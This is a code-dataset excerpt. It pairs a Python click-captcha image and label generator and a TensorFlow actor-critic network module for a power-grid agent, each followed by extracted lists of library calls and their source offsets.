c = random.randint(0, 255)
return a, b, c
@staticmethod
def lerp_colour(c1, c2, t):
"""
计算每层的渐变色数值
:param c1:
:param c2:
:param t:
:return:
"""
return int(c1[0] + (c2[0] - c1[0]) * t), int(c1[1] + (c2[1] - c1[1]) * t), int(c1[2] + (c2[2] - c1[2]) * t)
def init_gradient(self):
"""
生成渐变色列表
:return:
"""
list_of_colors = [self.gen_random_color(), self.gen_random_color(),
self.gen_random_color(), self.gen_random_color()]
for i in range(len(list_of_colors) - 2):
for j in range(self.height):
self.gradient.append(self.lerp_colour(list_of_colors[i], list_of_colors[i + 1], j / self.height))
def init_gradient_image_draw(self):
"""
生成一张渐变色背景的图片
:return:
"""
self.img = Image.new(self.mode, (self.width, self.height), (0, 0, 0))
for i in range(self.height):
for j in range(self.width):
self.img.putpixel((j, i), self.gradient[j])
self.draw = ImageDraw.Draw(self.img)
def generate_random_location(self, i_num):
"""
生成一个随机的位置,且判断不与之前的位置重合
:param i_num:
:return:
"""
# print("=== <word index: {}> start generate random location (x, y)".format(i_num))
while True:
# print(">>> start judge <<<")
judge = [False] * i_num
normal = [True] * i_num
location_x = random.randint(self.width_left_offset, self.width - self.width_right_offset)
location_y = random.randint(self.height_top_offset, self.height - self.height_bottom_offset)
# print("word_point_list: {}".format(self.word_point_list))
# print("right now (x, y) -> ({}, {})".format(location_x, location_y))
for index, wp in enumerate(self.word_point_list):
x1, y1 = wp
if location_x > x1 + self.word_size + self.word_offset:
judge[index] = True
elif location_x + self.word_size + self.word_offset < x1:
judge[index] = True
elif location_y > y1 + self.word_size + self.word_offset:
judge[index] = True
elif location_y + self.word_size + self.word_offset < y1:
judge[index] = True
else:
# print("(x, y)->({}, {}) interference to word_point_list!".format(location_x, location_y))
continue
if judge == normal:
# print("(x, y) -> ({}, {}) -> pass".format(location_x, location_y))
return location_x, location_y
def add_text_to_images(self):
"""
添加文字到图片
:return:
"""
captcha_info = dict()
captcha_info["word"] = list()
for i in range(0, self.word_count):
# 生成随机位置 + 避免互相干扰
location_x, location_y = self.generate_random_location(i)
# 对象位置加入到列表
self.word_point_list.append([location_x, location_y])
# 随机选择文字并绘制
word = self.get_random_word()
self.draw.text((location_x, location_y), word, font=self.set_font, fill=(0, 0, 0))
w, h = self.draw.textsize(word, self.set_font)
info = {"x": location_x,
"y": location_y,
"w": w,
"h": h,
"value": word}
captcha_info["word"].append(info)
captcha_info["word_width"] = self.word_size
return captcha_info
def add_interference_line(self):
"""
添加干扰线
:return:
"""
num = random.randint(self.inter_line_min, self.inter_line_max)
for i in range(num):
line_x = random.randint(self.width_left_offset, self.width - self.width_right_offset)
line_y = random.randint(self.height_top_offset, self.height - self.height_bottom_offset)
line_x_offset = random.randint(*self.interference_line_radius)
line_y_offset = random.randint(*self.interference_line_radius)
start_point = (line_x, line_y)
end_point = (line_x + line_x_offset, line_y + line_y_offset)
self.draw.line([start_point, end_point], self.gen_random_line_color(), width=self.interference_line_width)
return self.draw
def add_dummy_word(self):
"""
添加虚拟文字
:return:
"""
# 虚构文字数量
captcha_info = dict()
captcha_info["dummy"] = list()
num_a = random.randint(self.dummy_word_count_min, self.dummy_word_count_max)
for i in range(num_a):
# 虚构文字笔画数
num_b = random.randint(self.dummy_word_strokes_min, self.dummy_word_strokes_max)
# 生成随机位置+避免互相干扰
location_x, location_y = self.generate_random_location(i + self.word_count)
self.word_point_list.append([location_x, location_y])
# 确定位置后开始生成坐标
bx = random.randint(location_x, location_x + self.word_size) # x'
by = random.randint(location_y, location_y + self.word_size) # y'
line_x_end = location_x + self.word_size # x + 20
line_y_end = location_y + self.word_size # y + 20
a = (bx, location_y)
b = (line_x_end, by)
c = (bx, line_y_end)
d = (location_x, by)
for j in range(num_b):
draw_type = random.randint(1, 6)
if draw_type == 1:
self.draw.line([a, b], self.dummy_word_color, width=self.dummy_word_width)
elif draw_type == 2:
self.draw.line([a, c], self.dummy_word_color, width=self.dummy_word_width)
elif draw_type == 3:
self.draw.line([a, d], self.dummy_word_color, width=self.dummy_word_width)
elif draw_type == 4:
self.draw.line([b, c], self.dummy_word_color, width=self.dummy_word_width)
elif draw_type == 5:
self.draw.line([b, d], self.dummy_word_color, width=self.dummy_word_width)
else: # this is 6 type
self.draw.line([c, d], self.dummy_word_color, width=self.dummy_word_width)
info = {"x": location_x,
"y": location_y,
"value": "dummy"}
captcha_info["dummy"].append(info)
return captcha_info
def save_this_image(self, order_num):
"""
保存图片和标签
:param order_num:
:return:
"""
tc = str(time.time()).replace(".", "")
# 图片
img_file = "{}_{}.{}".format(order_num, tc, self.image_postfix)
img_path = os.path.join(self.save_img_dir, img_file)
self.img.save(img_path)
# 标签
label_file = "{}_{}.{}".format(order_num, tc, self.label_type)
label_path = os.path.join(self.save_label_dir, label_file)
if self.label_type == "json":
with open(label_path, "w", encoding="utf-8") as f:
content = json.dumps(self.label_string, ensure_ascii=False, indent=4)
f.write(content)
elif self.label_type == "xml":
self.render_xml_template(img_file, img_path, label_path)
def render_xml_template(self, img_file, img_path, save_path):
xml_data = dict()
xml_data["words"] = list()
xml_data["dummy_words"] = list()
xml_data["img_path"] = os.path.join(self.basedir, img_path)
xml_data["img_name"] = img_file
xml_data["folder_name"] = self.save_label_dir.split("/")[-1]
xml_data["width"] = self.width
xml_data["height"] = self.height
if self.label_string.get("word", None):
for w in self.label_string["word"]:
item = dict()
item["xmin"] = w["x"]
item["xmax"] = w["x"] + w["w"]
item["ymin"] = w["y"] + self.location_offset
item["ymax"] = w["y"] + w["h"]
item["label"] = w["value"]
xml_data["words"].append(item)
if self.label_string.get("dummy", None):
for w in self.label_string["dummy"]:
item = dict()
item["xmin"] = w["x"] - self.dummy_word_width
item["xmax"] = w["x"] + self.word_size + self.dummy_word_width
item["ymin"] = w["y"] - self.dummy_word_width
item["ymax"] = w["y"] + self.word_size + self.dummy_word_width
xml_data["dummy_words"].append(item)
with open(self.template_path, "r", encoding="utf-8") as f:
before_data = f.read()
t = Template(before_data)
with open(save_path, 'w', encoding="utf-8") as f:
after_data = t.render(xml_data)
f.write(after_data)
def create_image(self, order_num=0):
"""
根据配置生成一张图片
:param order_num:序号
:return:
"""
if not self.set_font:
raise ConfigError("请先设置字体")
print("\n--------------------- Generate picture <{}> -----------------------: ".format(order_num))
# 初始化绘画对象和所有对象的位置
self.gradient = list()
self.init_gradient()
self.init_gradient_image_draw()
self.word_point_list = []
self.word_count = random.randint(self.word_count_min, self.word_count_max)
# 添加文字
if self.enable_add_text:
captcha_info = self.add_text_to_images()
self.label_string = captcha_info
# 创建干扰线
if self.enable_interference_line:
self.add_interference_line()
# 创建干扰虚构文字
if self.enable_dummy_word:
captcha_info = self.add_dummy_word()
self.label_string.update(captcha_info)
def running_time(self, time):
m = time / 60
h = m / 60
if m > 1:
if h > 1:
return str('%.2f' % h) + 'h'
else:
return str('%.2f' % m) + 'm'
else:
return str('%.2f' % time) + 's'
def create_image_by_batch(self, count=5):
"""
生成指定数量的图片
:param count:
:return:
"""
strat_time = time.time()
if not self.set_font:
raise ConfigError("请先设置字体")
if self.label_type in ("xml", "json"):
pass
else:
raise ConfigError("标签文件的格式只能为xml或者json")
self.enable_save_status = True
# 判断文件夹是否存在
if not os.path.exists(self.save_img_dir):
os.makedirs(self.save_img_dir)
if not os.path.exists(self.save_label_dir):
os.makedirs(self.save_label_dir)
number = count
time_list = []
for i in range(count):
strats_time = time.time()
number -= 1
self.create_image(i)
# 保存图片
if self.enable_save_status:
self.save_this_image(i)
end_time = time.time()
time_data = end_time - strats_time
time_list.append(time_data)
print(f'已耗时: {self.running_time(end_time - strat_time)}')
print(f'预计耗时: {self.running_time((np.mean(time_list)) * number)}')
def show(self):
"""
展示图片
:return:
"""
if not self.set_font:
raise ConfigError("请先设置字体")
self.img.show()
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("captcha info: {}".format(self.label_string))
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
def save(self, path="test.jpg"):
"""
保存图片
:param path:
:return:
"""
if not self.set_font:
raise ConfigError("请先设置字体")
self.img.save(path)
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("captcha info: {}".format(self.label_string))
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
if __name__ == '__main__':
# 创建对象
c = ClickCaptcha()
c.font_settings(word_size=32, font_path="msyh.ttf", word_list_file_path="chinese_word.json")
c.width = 416 # 宽度
c.height = 416 # 高度
# 配置开关
c.enable_add_text = True # 添加文字
# 模板路径
c.template_path = "exp.xml"
c.enable_interference_line = True # 添加干扰线
c.enable_dummy_word = False # 添加虚构文字对象
c.create_image_by_batch(20)
|
[
"jinja2.Template",
"PIL.Image.new",
"json.load",
"random.randint",
"os.makedirs",
"os.getcwd",
"os.path.exists",
"random.choice",
"json.dumps",
"time.time",
"PIL.ImageFont.truetype",
"numpy.mean",
"PIL.ImageDraw.Draw",
"os.path.join"
] |
[((313, 324), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (322, 324), False, 'import os\n'), ((1758, 1798), 'os.path.join', 'os.path.join', (['self.basedir', '"""JPEGImages"""'], {}), "(self.basedir, 'JPEGImages')\n", (1770, 1798), False, 'import os\n'), ((1829, 1870), 'os.path.join', 'os.path.join', (['self.basedir', '"""Annotations"""'], {}), "(self.basedir, 'Annotations')\n", (1841, 1870), False, 'import os\n'), ((3288, 3317), 'random.choice', 'random.choice', (['self.word_list'], {}), '(self.word_list)\n', (3301, 3317), False, 'import random\n'), ((3447, 3469), 'random.randint', 'random.randint', (['(0)', '(255)'], {}), '(0, 255)\n', (3461, 3469), False, 'import random\n'), ((3482, 3505), 'random.randint', 'random.randint', (['(50)', '(255)'], {}), '(50, 255)\n', (3496, 3505), False, 'import random\n'), ((3518, 3541), 'random.randint', 'random.randint', (['(50)', '(255)'], {}), '(50, 255)\n', (3532, 3541), False, 'import random\n'), ((3688, 3710), 'random.randint', 'random.randint', (['(0)', '(255)'], {}), '(0, 255)\n', (3702, 3710), False, 'import random\n'), ((3723, 3745), 'random.randint', 'random.randint', (['(0)', '(255)'], {}), '(0, 255)\n', (3737, 3745), False, 'import random\n'), ((3758, 3780), 'random.randint', 'random.randint', (['(0)', '(255)'], {}), '(0, 255)\n', (3772, 3780), False, 'import random\n'), ((4653, 4711), 'PIL.Image.new', 'Image.new', (['self.mode', '(self.width, self.height)', '(0, 0, 0)'], {}), '(self.mode, (self.width, self.height), (0, 0, 0))\n', (4662, 4711), False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((4870, 4894), 'PIL.ImageDraw.Draw', 'ImageDraw.Draw', (['self.img'], {}), '(self.img)\n', (4884, 4894), False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((7511, 7567), 'random.randint', 'random.randint', (['self.inter_line_min', 'self.inter_line_max'], {}), '(self.inter_line_min, self.inter_line_max)\n', (7525, 7567), False, 'import random\n'), ((8395, 8463), 'random.randint', 'random.randint', (['self.dummy_word_count_min', 'self.dummy_word_count_max'], {}), '(self.dummy_word_count_min, self.dummy_word_count_max)\n', (8409, 8463), False, 'import random\n'), ((10577, 10618), 'os.path.join', 'os.path.join', (['self.save_img_dir', 'img_file'], {}), '(self.save_img_dir, img_file)\n', (10589, 10618), False, 'import os\n'), ((10757, 10802), 'os.path.join', 'os.path.join', (['self.save_label_dir', 'label_file'], {}), '(self.save_label_dir, label_file)\n', (10769, 10802), False, 'import os\n'), ((11331, 11367), 'os.path.join', 'os.path.join', (['self.basedir', 'img_path'], {}), '(self.basedir, img_path)\n', (11343, 11367), False, 'import os\n'), ((13200, 13256), 'random.randint', 'random.randint', (['self.word_count_min', 'self.word_count_max'], {}), '(self.word_count_min, self.word_count_max)\n', (13214, 13256), False, 'import random\n'), ((14090, 14101), 'time.time', 'time.time', ([], {}), '()\n', (14099, 14101), False, 'import time\n'), ((2751, 2801), 'PIL.ImageFont.truetype', 'ImageFont.truetype', (['self.font_path', 'self.word_size'], {}), '(self.font_path, self.word_size)\n', (2769, 2801), False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((5289, 5365), 'random.randint', 'random.randint', (['self.width_left_offset', '(self.width - self.width_right_offset)'], {}), '(self.width_left_offset, self.width - self.width_right_offset)\n', (5303, 5365), False, 'import random\n'), ((5391, 5470), 'random.randint', 'random.randint', (['self.height_top_offset', '(self.height - self.height_bottom_offset)'], {}), '(self.height_top_offset, self.height - self.height_bottom_offset)\n', (5405, 5470), False, 'import random\n'), ((7618, 7694), 'random.randint', 'random.randint', (['self.width_left_offset', '(self.width - self.width_right_offset)'], {}), '(self.width_left_offset, self.width - self.width_right_offset)\n', (7632, 7694), False, 'import random\n'), ((7716, 7795), 'random.randint', 'random.randint', (['self.height_top_offset', '(self.height - self.height_bottom_offset)'], {}), '(self.height_top_offset, self.height - self.height_bottom_offset)\n', (7730, 7795), False, 'import random\n'), ((7824, 7870), 'random.randint', 'random.randint', (['*self.interference_line_radius'], {}), '(*self.interference_line_radius)\n', (7838, 7870), False, 'import random\n'), ((7899, 7945), 'random.randint', 'random.randint', (['*self.interference_line_radius'], {}), '(*self.interference_line_radius)\n', (7913, 7945), False, 'import random\n'), ((8537, 8609), 'random.randint', 'random.randint', (['self.dummy_word_strokes_min', 'self.dummy_word_strokes_max'], {}), '(self.dummy_word_strokes_min, self.dummy_word_strokes_max)\n', (8551, 8609), False, 'import random\n'), ((8837, 8892), 'random.randint', 'random.randint', (['location_x', '(location_x + self.word_size)'], {}), '(location_x, location_x + self.word_size)\n', (8851, 8892), False, 'import random\n'), ((8916, 8971), 'random.randint', 'random.randint', (['location_y', '(location_y + self.word_size)'], {}), '(location_y, location_y + self.word_size)\n', (8930, 8971), False, 'import random\n'), ((12550, 12571), 'jinja2.Template', 'Template', (['before_data'], {}), '(before_data)\n', (12558, 12571), False, 'from jinja2 import Template\n'), ((14378, 14411), 'os.path.exists', 'os.path.exists', (['self.save_img_dir'], {}), '(self.save_img_dir)\n', (14392, 14411), False, 'import os\n'), ((14425, 14455), 'os.makedirs', 'os.makedirs', (['self.save_img_dir'], {}), '(self.save_img_dir)\n', (14436, 14455), False, 'import os\n'), ((14471, 14506), 'os.path.exists', 'os.path.exists', (['self.save_label_dir'], {}), '(self.save_label_dir)\n', (14485, 14506), False, 'import os\n'), ((14520, 14552), 'os.makedirs', 'os.makedirs', (['self.save_label_dir'], {}), '(self.save_label_dir)\n', (14531, 14552), False, 'import os\n'), ((14656, 14667), 'time.time', 'time.time', ([], {}), '()\n', (14665, 14667), False, 'import time\n'), ((14847, 14858), 'time.time', 'time.time', ([], {}), '()\n', (14856, 14858), False, 'import time\n'), ((3134, 3146), 'json.load', 'json.load', (['f'], {}), '(f)\n', (3143, 3146), False, 'import json\n'), ((9299, 9319), 'random.randint', 'random.randint', (['(1)', '(6)'], {}), '(1, 6)\n', (9313, 9319), False, 'import random\n'), ((10930, 10989), 'json.dumps', 'json.dumps', (['self.label_string'], {'ensure_ascii': '(False)', 'indent': '(4)'}), '(self.label_string, ensure_ascii=False, indent=4)\n', (10940, 10989), False, 'import json\n'), ((10443, 10454), 'time.time', 'time.time', ([], {}), '()\n', (10452, 10454), False, 'import time\n'), ((15070, 15088), 'numpy.mean', 'np.mean', (['time_list'], {}), '(time_list)\n', (15077, 15088), True, 'import numpy as np\n')]
|
import os
import numpy as np
import tensorflow as tf
import tensorflow.keras as tfk
import tensorflow.keras.backend as K
import tensorflow.keras.models as tfkm
import tensorflow.keras.optimizers as tfko
import tensorflow.keras.layers as tfkl
import tensorflow.keras.activations as tfka
import tensorflow.keras.initializers as tfki
from WolperGrid_Config import WolperGrid_Config as cfg
uniform_initializerA = tfki.VarianceScaling(
distribution='uniform',
mode='fan_out',
scale=0.333)
uniform_initializerB = tfki.GlorotNormal()
uniform_initializerC = tfki.HeNormal()
kernel_init = uniform_initializerC
class WolperGrid_NN(object):
def __init__(self,
gridobj,
observation_size,
proto_size,
is_training = False):
self.input_size = observation_size
self.topo_size = gridobj.dim_topo
self.n_line = gridobj.n_line
self.disp_size = gridobj.n_gen
self.is_training = is_training
self.proto_size = proto_size
self.obs_nn = False
if self.obs_nn == True:
self.obs_size = 2048
else:
self.obs_size = self.input_size
# AC models
self.obs = None
self.actor = None
self.critic = None
self.construct_wg_obs()
self.construct_wg_actor()
self.construct_wg_critic()
def construct_resmlp(self,
layer_in,
hidden_size,
num_blocks,
name="resmlp"):
layer_name = "{}-resmlp-fc0".format(name)
layer_w = tfkl.Dense(hidden_size,
kernel_initializer=kernel_init,
name=layer_name)(layer_in)
for block in range(num_blocks):
layer_name = "{}-resmlp-fc{}-0".format(name, block)
layer1 = tfkl.Dense(hidden_size,
kernel_initializer=kernel_init,
name=layer_name)(layer_w)
layer1 = tf.nn.tanh(layer1)
layer_name = "{}-resmlp-fc{}-1".format(name, block)
layer2 = tfkl.Dense(hidden_size,
kernel_initializer=kernel_init,
name=layer_name)(layer1)
ln_name = "{}-ln-{}".format(name, block)
ln = tfkl.LayerNormalization(trainable=self.is_training,
name=ln_name)
layer_ln = ln(layer2 + layer_w)
layer_w = layer_ln
return layer_w
def construct_mlp(self,
layer_in,
layer_sizes,
name="mlp",
layer_norm=True,
activation=tf.nn.elu,
activation_final=None):
if layer_norm:
pre_name = "{}-ln-fc".format(name)
layer = tfkl.Dense(layer_sizes[0],
kernel_initializer=kernel_init,
name=pre_name)(layer_in)
ln_name = "{}-ln".format(name)
ln = tfkl.LayerNormalization(trainable=self.is_training,
name=ln_name)
layer = ln(layer, training=self.is_training)
th_name = "{}-tanh".format(name)
layer = tf.nn.tanh(layer, name=th_name)
size_index = 1
else:
size_index = 0
layer = layer_in
for i, size in enumerate(layer_sizes[size_index:-1]):
layer_name = "{}-fc-{}".format(name, i + 1)
layer = tfkl.Dense(size,
kernel_initializer=kernel_init,
name=layer_name)(layer)
# Add activation if provided
if activation is not None:
activation_name = "{}-act-{}".format(name, i + 1)
layer = activation(layer, name=activation_name)
# Final layer
layer_name = "{}-fc-{}".format(name, "final")
layer_final = tfkl.Dense(layer_sizes[-1],
kernel_initializer=kernel_init,
name=layer_name)(layer)
if activation_final is not None:
activation_name = "{}-act-{}".format(name, "final")
layer_final = activation_final(layer_final, name=activation_name)
# Return final
return layer_final
def construct_wg_obs(self):
input_shape = (self.input_size,)
input_obs = tfk.Input(dtype=tf.float32,
shape=input_shape,
name='input_obs')
## MLP variant
if self.obs_nn:
layer_n = 8
layer_idxs = np.arange(layer_n)
layer_range = [0, layer_n - 1]
size_range = [
self.input_size,
self.obs_size
]
sizes_np = np.interp(layer_idxs, layer_range, size_range)
sizes = list(sizes_np)
output_obs = self.construct_mlp(input_obs,
sizes,
name="obs",
layer_norm=True,
activation=tf.nn.elu,
activation_final=tf.nn.elu)
else: ## Disabled variant
output_obs = tfka.linear(input_obs)
obs_inputs = [input_obs]
obs_outputs = [output_obs]
self.obs = tfk.Model(inputs=obs_inputs,
outputs=obs_outputs,
name="obs_" + self.__class__.__name__)
self.obs_opt = tfko.Adam(lr=cfg.LR_CRITIC)
self.obs.compile(loss="mse", optimizer=self.obs_opt)
def construct_wg_actor(self):
# Defines input tensors and scalars
input_shape = (self.obs_size,)
input_obs = tfk.Input(dtype=tf.float32,
shape=input_shape,
name='actor_obs')
# Forward encode
## MLP variant
layer_n = 8
layer_idxs = np.arange(layer_n)
layer_range = [0, layer_n - 2, layer_n - 1]
size_range = [
self.obs_size,
128,
self.proto_size
]
sizes_np = np.interp(layer_idxs, layer_range, size_range)
sizes = list(sizes_np.astype(int))
proto = self.construct_mlp(input_obs,
sizes,
name="actor-mlp",
layer_norm=True,
activation=tf.nn.elu,
activation_final=tf.nn.tanh)
## Residual MLP variant
#proto_mlp = self.construct_resmlp(input_obs,
# 1024, 5,
# name="actor-res-mlp")
#proto_top0 = tfkl.Dense(1024,
# kernel_initializer=kernel_init,
# name="proto-fc1")(proto_mlp)
#proto_top1 = tf.nn.elu(proto_top0)
#proto_top2 = tfkl.Dense(1024,
# kernel_initializer=kernel_init,
# name="proto-fc2")(proto_top1)
#proto_top3 = tf.nn.elu(proto_top2)
#proto_top4 = tfkl.Dense(self.proto_size,
# kernel_initializer=kernel_init,
# name="proto-fc3")(proto_top3)
#proto = tf.nn.tanh(proto_top4)
# L2 Normalize actor output
#proto, _ = tf.linalg.normalize(proto, axis=-1, name="actor-norm")
# Backwards pass
actor_inputs = [ input_obs ]
actor_outputs = [ proto ]
self.actor = tfk.Model(inputs=actor_inputs,
outputs=actor_outputs,
name="actor_" + self.__class__.__name__)
self.actor_opt = tfko.Adam(lr=cfg.LR_ACTOR)
self.actor.compile(loss="mse", optimizer=self.actor_opt)
def construct_wg_critic(self):
input_obs_shape = (self.obs_size,)
input_obs = tfk.Input(dtype=tf.float32,
shape=input_obs_shape,
name='critic_obs')
input_proto_shape = (self.proto_size,)
input_proto = tfk.Input(dtype=tf.float32,
shape=input_proto_shape,
name='critic_proto')
input_concat = tf.concat([input_obs, input_proto], axis=-1,
name="critic_concat")
# Forward pass
## MLP variant
layer_n = 6
layer_idxs = np.arange(layer_n)
layer_range = [0, layer_n - 2, layer_n - 1]
size_range = [
1024,
128,
1
]
sizes_np = np.interp(layer_idxs, layer_range, size_range)
sizes = list(sizes_np.astype(int))
Q = self.construct_mlp(input_concat,
sizes,
name="critic-mlp",
layer_norm=False,
activation=tf.nn.elu,
activation_final=None)
## Residual MLP variant
#Q_mlp = self.construct_resmlp(input_concat, 1024, 8, "critic")
#Q_top0 = tfkl.Dense(512)(Q_mlp)
#Q_top1 = tf.nn.elu(Q_top0)
#Q_top2 = tfkl.Dense(256)(Q_top1)
#Q_top3 = tf.nn.elu(Q_top2)
#Q_top4 = tfkl.Dense(256)(Q_top3)
#Q = tfkl.Dense(1)(Q_top4)
# Backwards pass
critic_inputs = [ input_obs, input_proto ]
critic_outputs = [ Q ]
self.critic = tfk.Model(inputs=critic_inputs,
outputs=critic_outputs,
name="critic_" + self.__class__.__name__)
# Keras model
self.critic_opt = tfko.Adam(lr=cfg.LR_CRITIC)
self.critic.compile(loss="mse", optimizer=self.critic_opt)
@staticmethod
def update_target_hard(source_model, target_model):
# Get parameters to update
target_params = target_model.variables
source_params = source_model.variables
# Update each param
for src, dest in zip(source_params, target_params):
dest.assign(src)
@staticmethod
def update_target_soft(source_model, target_model, tau=1e-3):
tau_inv = 1.0 - tau
# Get parameters to update
target_params = target_model.variables
source_params = source_model.variables
# Update each param
for src, dest in zip(source_params, target_params):
# Polyak averaging
var_update = src.value() * tau
var_persist = dest.value() * tau_inv
dest.assign(var_update + var_persist)
def save_network(self, path):
# Saves model at specified path
# Compute paths
obs_path = os.path.join(path, "obs.tf")
actor_path = os.path.join(path, "actor.tf")
critic_path = os.path.join(path, "critic.tf")
self.obs.save_weights(obs_path)
self.actor.save_weights(actor_path)
self.critic.save_weights(critic_path)
print("Successfully saved model at: {}".format(path))
def load_network(self, path):
# Compute paths
obs_path = os.path.join(path, "obs.tf")
actor_path = os.path.join(path, "actor.tf")
critic_path = os.path.join(path, "critic.tf")
self.obs.load_weights(obs_path)
self.actor.load_weights(actor_path)
self.critic.load_weights(critic_path)
print("Succesfully loaded network from: {}".format(path))
|
[
"tensorflow.keras.layers.Dense",
"tensorflow.nn.tanh",
"tensorflow.keras.activations.linear",
"tensorflow.keras.Input",
"tensorflow.keras.initializers.HeNormal",
"tensorflow.keras.layers.LayerNormalization",
"tensorflow.concat",
"tensorflow.keras.initializers.GlorotNormal",
"tensorflow.keras.Model",
"tensorflow.keras.initializers.VarianceScaling",
"tensorflow.keras.optimizers.Adam",
"numpy.arange",
"numpy.interp",
"os.path.join"
] |
[((412, 485), 'tensorflow.keras.initializers.VarianceScaling', 'tfki.VarianceScaling', ([], {'distribution': '"""uniform"""', 'mode': '"""fan_out"""', 'scale': '(0.333)'}), "(distribution='uniform', mode='fan_out', scale=0.333)\n", (432, 485), True, 'import tensorflow.keras.initializers as tfki\n'), ((522, 541), 'tensorflow.keras.initializers.GlorotNormal', 'tfki.GlorotNormal', ([], {}), '()\n', (539, 541), True, 'import tensorflow.keras.initializers as tfki\n'), ((565, 580), 'tensorflow.keras.initializers.HeNormal', 'tfki.HeNormal', ([], {}), '()\n', (578, 580), True, 'import tensorflow.keras.initializers as tfki\n'), ((4590, 4654), 'tensorflow.keras.Input', 'tfk.Input', ([], {'dtype': 'tf.float32', 'shape': 'input_shape', 'name': '"""input_obs"""'}), "(dtype=tf.float32, shape=input_shape, name='input_obs')\n", (4599, 4654), True, 'import tensorflow.keras as tfk\n'), ((5613, 5706), 'tensorflow.keras.Model', 'tfk.Model', ([], {'inputs': 'obs_inputs', 'outputs': 'obs_outputs', 'name': "('obs_' + self.__class__.__name__)"}), "(inputs=obs_inputs, outputs=obs_outputs, name='obs_' + self.\n __class__.__name__)\n", (5622, 5706), True, 'import tensorflow.keras as tfk\n'), ((5784, 5811), 'tensorflow.keras.optimizers.Adam', 'tfko.Adam', ([], {'lr': 'cfg.LR_CRITIC'}), '(lr=cfg.LR_CRITIC)\n', (5793, 5811), True, 'import tensorflow.keras.optimizers as tfko\n'), ((6011, 6075), 'tensorflow.keras.Input', 'tfk.Input', ([], {'dtype': 'tf.float32', 'shape': 'input_shape', 'name': '"""actor_obs"""'}), "(dtype=tf.float32, shape=input_shape, name='actor_obs')\n", (6020, 6075), True, 'import tensorflow.keras as tfk\n'), ((6227, 6245), 'numpy.arange', 'np.arange', (['layer_n'], {}), '(layer_n)\n', (6236, 6245), True, 'import numpy as np\n'), ((6422, 6468), 'numpy.interp', 'np.interp', (['layer_idxs', 'layer_range', 'size_range'], {}), '(layer_idxs, layer_range, size_range)\n', (6431, 6468), True, 'import numpy as np\n'), ((7900, 7999), 'tensorflow.keras.Model', 'tfk.Model', ([], {'inputs': 'actor_inputs', 'outputs': 'actor_outputs', 'name': "('actor_' + self.__class__.__name__)"}), "(inputs=actor_inputs, outputs=actor_outputs, name='actor_' + self.\n __class__.__name__)\n", (7909, 7999), True, 'import tensorflow.keras as tfk\n'), ((8082, 8108), 'tensorflow.keras.optimizers.Adam', 'tfko.Adam', ([], {'lr': 'cfg.LR_ACTOR'}), '(lr=cfg.LR_ACTOR)\n', (8091, 8108), True, 'import tensorflow.keras.optimizers as tfko\n'), ((8273, 8342), 'tensorflow.keras.Input', 'tfk.Input', ([], {'dtype': 'tf.float32', 'shape': 'input_obs_shape', 'name': '"""critic_obs"""'}), "(dtype=tf.float32, shape=input_obs_shape, name='critic_obs')\n", (8282, 8342), True, 'import tensorflow.keras as tfk\n'), ((8472, 8545), 'tensorflow.keras.Input', 'tfk.Input', ([], {'dtype': 'tf.float32', 'shape': 'input_proto_shape', 'name': '"""critic_proto"""'}), "(dtype=tf.float32, shape=input_proto_shape, name='critic_proto')\n", (8481, 8545), True, 'import tensorflow.keras as tfk\n'), ((8634, 8700), 'tensorflow.concat', 'tf.concat', (['[input_obs, input_proto]'], {'axis': '(-1)', 'name': '"""critic_concat"""'}), "([input_obs, input_proto], axis=-1, name='critic_concat')\n", (8643, 8700), True, 'import tensorflow as tf\n'), ((8822, 8840), 'numpy.arange', 'np.arange', (['layer_n'], {}), '(layer_n)\n', (8831, 8840), True, 'import numpy as np\n'), ((8994, 9040), 'numpy.interp', 'np.interp', (['layer_idxs', 'layer_range', 'size_range'], {}), '(layer_idxs, layer_range, size_range)\n', (9003, 9040), True, 'import numpy as np\n'), ((9840, 9941), 'tensorflow.keras.Model', 'tfk.Model', ([], {'inputs': 'critic_inputs', 'outputs': 'critic_outputs', 'name': "('critic_' + self.__class__.__name__)"}), "(inputs=critic_inputs, outputs=critic_outputs, name='critic_' +\n self.__class__.__name__)\n", (9849, 9941), True, 'import tensorflow.keras as tfk\n'), ((10050, 10077), 'tensorflow.keras.optimizers.Adam', 'tfko.Adam', ([], {'lr': 'cfg.LR_CRITIC'}), '(lr=cfg.LR_CRITIC)\n', (10059, 10077), True, 'import tensorflow.keras.optimizers as tfko\n'), ((11090, 11118), 'os.path.join', 'os.path.join', (['path', '"""obs.tf"""'], {}), "(path, 'obs.tf')\n", (11102, 11118), False, 'import os\n'), ((11140, 11170), 'os.path.join', 'os.path.join', (['path', '"""actor.tf"""'], {}), "(path, 'actor.tf')\n", (11152, 11170), False, 'import os\n'), ((11193, 11224), 'os.path.join', 'os.path.join', (['path', '"""critic.tf"""'], {}), "(path, 'critic.tf')\n", (11205, 11224), False, 'import os\n'), ((11496, 11524), 'os.path.join', 'os.path.join', (['path', '"""obs.tf"""'], {}), "(path, 'obs.tf')\n", (11508, 11524), False, 'import os\n'), ((11546, 11576), 'os.path.join', 'os.path.join', (['path', '"""actor.tf"""'], {}), "(path, 'actor.tf')\n", (11558, 11576), False, 'import os\n'), ((11599, 11630), 'os.path.join', 'os.path.join', (['path', '"""critic.tf"""'], {}), "(path, 'critic.tf')\n", (11611, 11630), False, 'import os\n'), ((1637, 1709), 'tensorflow.keras.layers.Dense', 'tfkl.Dense', (['hidden_size'], {'kernel_initializer': 'kernel_init', 'name': 'layer_name'}), '(hidden_size, kernel_initializer=kernel_init, name=layer_name)\n', (1647, 1709), True, 'import tensorflow.keras.layers as tfkl\n'), ((2071, 2089), 'tensorflow.nn.tanh', 'tf.nn.tanh', (['layer1'], {}), '(layer1)\n', (2081, 2089), True, 'import tensorflow as tf\n'), ((2390, 2455), 'tensorflow.keras.layers.LayerNormalization', 'tfkl.LayerNormalization', ([], {'trainable': 'self.is_training', 'name': 'ln_name'}), '(trainable=self.is_training, name=ln_name)\n', (2413, 2455), True, 'import tensorflow.keras.layers as tfkl\n'), ((3151, 3216), 'tensorflow.keras.layers.LayerNormalization', 'tfkl.LayerNormalization', ([], {'trainable': 'self.is_training', 'name': 'ln_name'}), 